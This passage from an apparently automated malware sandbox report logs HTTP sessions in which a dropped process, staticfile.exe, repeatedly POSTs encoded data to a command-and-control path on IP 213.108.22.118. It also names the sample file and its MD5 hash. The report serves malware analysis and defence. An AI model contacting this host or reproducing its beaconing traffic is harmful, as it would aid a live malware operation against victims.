                                        Data Ascii: U]Y]PZP]U\WYP]ZTX\[^Q_S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+:#1 $= ,Z724$>'*%+Z"/"'/Z&&[-4._/%^/8
                                        Nov 30, 2024 22:39:08.011929035 CET25INHTTP/1.1 100 Continue


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        137192.168.2.450141213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:08.041727066 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:08.389142990 CET1428OUTData Raw: 50 5e 59 5a 50 5f 50 59 55 5c 57 59 50 52 5a 52 58 5e 5b 52 51 50 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P^YZP_PYU\WYPRZRX^[RQPSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"?>* 2%X _,(%70?_>&3] ?$-+_239.$._/%^/
                                        Nov 30, 2024 22:39:09.323159933 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:09.555071115 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 59 29 28 08 13 3f 38 22 03 2c 2f 01 0d 26 16 3e 01 38 04 35 14 28 04 13 1c 3d 02 04 0d 35 16 0e 03 3f 07 00 56 27 18 21 00 3c 3b 2b 5e 0c 1b 23 1c 3c 15 25 5c 30 05 24 16 24 56 30 13 21 22 37 58 24 5b 26 1c 3f 06 36 5d 22 31 2a 19 3b 32 29 54 25 17 30 12 2b 3c 33 11 21 13 2f 56 0b 12 22 53 24 32 0f 5b 24 3f 3c 11 34 33 3e 5e 21 26 32 58 37 3f 0b 53 22 38 31 05 28 10 0c 5b 37 1d 23 0e 29 03 32 06 31 32 0d 52 2a 17 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #Y)(?8",/&>85(=5?V'!<;+^#<%\0$$V0!"7X$[&?6]"1*;2)T%0+<3!/V"S$2[$?<43>^!&2X7?S"81([7#)212R*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        138192.168.2.450142213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:08.167404890 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:08.514071941 CET2544OUTData Raw: 55 58 59 5f 55 5e 50 50 55 5c 57 59 50 5d 5a 51 58 5b 5b 5e 51 5f 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UXY_U^PPU\WYP]ZQX[[^Q_SYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!+.._414^$-;;Z/W&<$=7_=/7<"3>;&>^.._/%^/8
                                        Nov 30, 2024 22:39:09.417305946 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:09.664366961 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        139192.168.2.450143213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:09.919248104 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:39:10.264081001 CET2544OUTData Raw: 55 5b 59 54 55 5b 50 51 55 5c 57 59 50 59 5a 52 58 5e 5b 5b 51 5a 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[YTU[PQU\WYPYZRX^[[QZS\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!@(>%71+%=(_8/?S&];3=_>8 =W0+^2U>[-._/%^/(
                                        Nov 30, 2024 22:39:11.277532101 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:11.520231009 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:11 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        140192.168.2.450144213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:11.884919882 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:12.233700037 CET2544OUTData Raw: 55 50 5c 5d 55 59 50 5f 55 5c 57 59 50 5a 5a 50 58 54 5b 52 51 50 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UP\]UYP_U\WYPZZPXT[RQPSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?.&#!#%>4,Z7&($S'4(5[#?=$_&3.4._/%^/$
                                        Nov 30, 2024 22:39:13.124336004 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:13.368362904 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:12 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        141192.168.2.450145213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:13.616782904 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:13.967295885 CET2544OUTData Raw: 55 5b 59 5d 55 54 55 58 55 5c 57 59 50 52 5a 55 58 58 5b 59 51 5a 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[Y]UTUXU\WYPRZUXX[YQZSZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!*._ 4X&8Z;<'1;$'-#^)%+4&-?]%&^:4._/%^/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        142192.168.2.450146213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:14.739980936 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:15.095664024 CET1428OUTData Raw: 50 5b 5c 5d 55 55 50 50 55 5c 57 59 50 59 5a 55 58 54 5b 58 51 5b 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[\]UUPPU\WYPYZUXT[XQ[S_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(-54\1- \/<<%8?3(5; Y%S&=%^:._/%^/(
                                        Nov 30, 2024 22:39:16.038455009 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:16.289685011 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 1b 3f 3b 31 05 28 38 07 5b 3a 59 38 1c 31 28 2a 06 38 3d 2d 5c 29 3a 3d 59 2a 2c 0f 52 22 3b 2b 12 2b 39 3d 0a 30 35 32 1f 2b 11 2b 5e 0c 1b 23 1b 3c 5d 3d 14 33 05 0a 5d 30 20 2b 00 35 21 27 5f 33 3e 21 0a 3c 16 35 06 22 31 21 0b 38 32 29 53 32 39 0a 13 3e 3f 2c 0b 21 03 2f 56 0b 12 22 14 30 1c 21 5f 25 01 20 10 20 09 21 07 22 1f 29 02 37 11 21 10 21 01 25 04 2b 10 2a 5b 23 1d 2c 14 29 3d 2a 00 26 0b 30 08 29 17 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #?;1(8[:Y81(*8=-\):=Y*,R";++9=052++^#<]=3]0 +5!'_3>!<5"1!82)S29>?,!/V"0!_% !")7!!%+*[#,)=*&0)/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        143192.168.2.450147213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:15.025722980 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:15.376386881 CET2544OUTData Raw: 55 51 59 59 50 5f 50 5d 55 5c 57 59 50 5f 5a 53 58 59 5b 5a 51 5c 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQYYP_P]U\WYP_ZSXY[ZQ\S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!+41;2#/7U&8 R'=$=%?X7?)U$[+Z%*X9._/%^/0
                                        Nov 30, 2024 22:39:16.230144024 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:16.462869883 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:16 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        144192.168.2.450148213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:16.716767073 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:39:17.061021090 CET2544OUTData Raw: 55 5d 59 5c 50 5d 50 5c 55 5c 57 59 50 52 5a 5d 58 5f 5b 58 51 5c 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U]Y\P]P\U\WYPRZ]X_[XQ\S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!C(>% !+2X#;3&;0(*6$#?!R$=]16Y.._/%^/
                                        Nov 30, 2024 22:39:17.997257948 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:18.240673065 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        145192.168.2.450149213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:18.481699944 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:18.829046011 CET2544OUTData Raw: 50 5b 59 5d 55 5a 55 5c 55 5c 57 59 50 58 5a 51 58 5e 5b 59 51 5a 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[Y]UZU\U\WYPXZQX^[YQZSUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D(=%7&>'//#%]?3=?X*Y#>$=[23&-._/%^/,
                                        Nov 30, 2024 22:39:19.796019077 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:20.040512085 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        146192.168.2.450150213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:20.294828892 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:20.639252901 CET2544OUTData Raw: 55 59 5c 5d 55 5f 55 58 55 5c 57 59 50 58 5a 55 58 58 5b 53 51 51 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UY\]U_UXU\WYPXZUXX[SQQS[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+1 ! &X(/,S2]+$.?*0 -V$810*:4._/%^/,


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        147192.168.2.450151213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:21.416575909 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:21.767708063 CET1428OUTData Raw: 50 5c 5c 5e 55 59 50 50 55 5c 57 59 50 5d 5a 5c 58 5f 5b 5d 51 5e 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\\^UYPPU\WYP]Z\X_[]Q^SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(!77&#;#V28R$-(=%3Y4&$><20>_,4._/%^/8
                                        Nov 30, 2024 22:39:22.667907000 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:22.912348032 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 05 3f 3b 3a 5a 3f 06 2d 10 2e 2f 30 54 25 5e 22 01 2d 2d 25 14 29 3a 31 12 3e 02 21 1e 35 38 2f 5d 3f 2a 21 0a 27 08 0c 59 2b 01 2b 5e 0c 1b 20 43 3c 38 35 5f 30 15 37 05 30 20 09 06 22 57 3c 00 27 13 0c 56 3f 06 0c 1a 34 0f 3a 19 2c 0b 3d 1e 26 29 33 03 3d 3c 2f 1c 22 39 2f 56 0b 12 22 19 27 21 2a 01 31 2c 20 5b 20 0e 21 05 22 1f 2e 5c 20 2c 2a 0e 22 06 22 5a 29 2d 2d 00 21 30 3b 0e 2a 13 39 10 31 22 3f 17 2a 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: ?;:Z?-./0T%^"--%):1>!58/]?*!'Y++^ C<85_070 "W<'V?4:,=&)3=</"9/V"'!*1, [ !".\ ,*""Z)--!0;*91"?*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        148192.168.2.450152213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:21.541558981 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:39:21.927586079 CET2544OUTData Raw: 55 5a 5c 58 50 5f 50 5f 55 5c 57 59 50 5e 5a 5d 58 5d 5b 59 51 5c 53 55 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UZ\XP_P_U\WYP^Z]X][YQ\SUU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D*>:#!<\2X+;$$;4$ *Y7?*$= 19:._/%^/4
                                        Nov 30, 2024 22:39:22.798954010 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:23.040797949 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        149192.168.2.450153213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:39:23.380140066 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:39:23.732897043 CET2544OUTData Raw: 55 5f 59 58 50 5d 50 58 55 5c 57 59 50 5a 5a 55 58 59 5b 52 51 5c 53 5c 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U_YXP]PXU\WYPZZUXY[RQ\S\U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!*-6_ 28$. [8/?W&;4U%.<*,#3&3_.._/%^/$
                                        Nov 30, 2024 22:39:24.731673002 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:39:24.967475891 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:39:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:16:35:26
                                        Start date:30/11/2024
                                        Path:C:\Users\user\Desktop\lfcdgbuksf.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\lfcdgbuksf.exe"
                                        Imagebase:0x960000
                                        File size:1'657'344 bytes
                                        MD5 hash:8C6E4C86C216B898F24FF14B417C4369
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
